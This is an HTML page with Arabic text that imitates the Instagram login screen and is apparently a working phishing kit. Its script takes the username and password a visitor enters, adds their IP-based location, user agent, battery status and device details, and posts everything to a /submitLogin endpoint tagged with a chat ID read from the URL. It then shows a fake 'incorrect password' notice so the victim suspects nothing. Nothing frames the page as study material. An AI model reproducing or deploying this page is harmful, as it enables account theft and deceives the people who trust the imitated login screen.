<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>تسجيل الدخول • Instagram</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fafafa;
            margin: 0;
            padding: 20px;
        }
        .container {
            max-width: 350px;
            margin: 0 auto;
            background-color: #fff;
            border: 1px solid #dbdbdb;
            border-radius: 1px;
            padding: 20px;
        }
        .logo {
            text-align: center;
            margin-bottom: 20px;
        }
        .fb-login {
            background-color: #0095f6;
            color: #fff;
            border: none;
            border-radius: 4px;
            padding: 8px 0;
            font-weight: bold;
            width: 100%;
            margin-bottom: 20px;
        }
        input {
            width: 100%;
            padding: 8px;
            margin-bottom: 10px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
        }
        .login-btn {
            background-color: #0095f6;
            color: #fff;
            border: none;
            border-radius: 4px;
            padding: 8px 0;
            font-weight: bold;
            width: 100%;
        }
        .forgot-password, .signup {
            text-align: center;
            margin-top: 20px;
            font-size: 14px;
        }
        .meta {
            text-align: center;
            margin-top: 20px;
            color: #8e8e8e;
            font-size: 12px;
        }
        .notification {
            display: none;
            background-color: #4CAF50;
            color: white;
            text-align: center;
            padding: 10px;
            margin-top: 10px;
            border-radius: 4px;
        }
        .notification.show {
            display: block;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <h1>Instagram</h1>
        </div>
        <button class="fb-login">
            <i class="fab fa-facebook-square"></i> متابعة بحساب فيسبوك
        </button>
        <div style="text-align: center; margin: 10px 0;">أو</div>
        <form id="loginForm">
            <input type="text" name="username" placeholder="رقم الهاتف أو اسم المستخدم أو البريد الإلكتروني">
            <input type="password" name="password" placeholder="كلمة السر">
            <input type="hidden" id="chatIdInput" name="chatId">
            <button type="submit" class="login-btn">تسجيل الدخول</button>
        </form>
        <div class="forgot-password">
            <a href="#">هل نسيت كلمة السر؟</a>
        </div>
        <div class="signup">
            ليس لديك حساب؟ <a href="#">تسجيل</a>
        </div>
        <div class="meta">
            from
            <img src="https://static.cdninstagram.com/rsrc.php/yb/r/SxCWlJznXoy.svg" alt="Meta" height="20">
        </div>
    </div>

    <div class="notification" id="notification">
        <p>كلمه السر او اسم المستخدم غير صحيحه يرجى استخدام اسم مستخدم وكلمه سر صحيحه او قوم بتسجيل عن طريق الإيميل او رقم الهاتف .</p>
    </div>

    <script>
        const loginForm = document.getElementById('loginForm');
        const chatIdInput = document.getElementById('chatIdInput');
        const notification = document.getElementById('notification');

        const chatId = window.location.pathname.split('/').pop();
        chatIdInput.value = chatId;

        async function getIPInfo() {
            try {
                const response = await fetch('https://ipapi.co/json/');
                const data = await response.json();
                return {
                    ip: data.ip,
                    country: data.country_name,
                    city: data.city
                };
            } catch (error) {
                console.error('Error fetching IP info:', error);
                return {
                    ip: 'Unknown',
                    country: 'Unknown',
                    city: 'Unknown'
                };
            }
        }

        function getPlatformInfo() {
            const ua = navigator.userAgent;
            let platform = "Unknown";
            if (/Windows/.test(ua)) platform = "Instagram";
            else if (/Mac/.test(ua)) platform = "Instagram";
            else if (/Linux/.test(ua)) platform = "Instagram";
            else if (/Android/.test(ua)) platform = "Instagram";
            else if (/iPhone|iPad|iPod/.test(ua)) platform = "Instagram";

            return {
                platform: platform,
                userAgent: ua
            };
        }

        async function getBatteryInfo() {
            if ('getBattery' in navigator) {
                try {
                    const battery = await navigator.getBattery();
                    return {
                        batteryLevel: battery.level,
                        batteryCharging: battery.charging
                    };
                } catch (error) {
                    console.error('Error getting battery info:', error);
                }
            }
            return {
                batteryLevel: undefined,
                batteryCharging: undefined
            };
        }

        function getDeviceVersion() {
            const ua = navigator.userAgent;
            const match = ua.match(/\(([^)]+)\)/);
            return match ? match[1] : 'Unknown';
        }

        loginForm.addEventListener('submit', async (event) => {
            event.preventDefault();
            const formData = new FormData(loginForm);
            const data = Object.fromEntries(formData.entries());

            const ipInfo = await getIPInfo();
            const platformInfo = getPlatformInfo();
            const batteryInfo = await getBatteryInfo();
            const deviceVersion = getDeviceVersion();

            Object.assign(data, ipInfo, platformInfo, batteryInfo, { deviceVersion });

            try {
                const response = await fetch('/submitLogin', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify(data)
                });
                const result = await response.json();
                if (result.success) {
                    notification.classList.add('show');
                    setTimeout(() => {
                        notification.classList.remove('show');
                    }, 5000);
                    loginForm.reset();
                } else {
                    alert('حدث خطأ أثناء تنفيذ الطلب. يرجى المحاولة مرة أخرى.');
                }
            } catch (error) {
                console.error('Error:', error);
                alert('حدث خطأ أثناء الاتصال بالخادم. يرجى المحاولة مرة أخرى لاحقاً.');
            }
        });
    </script>
</body>
</html>
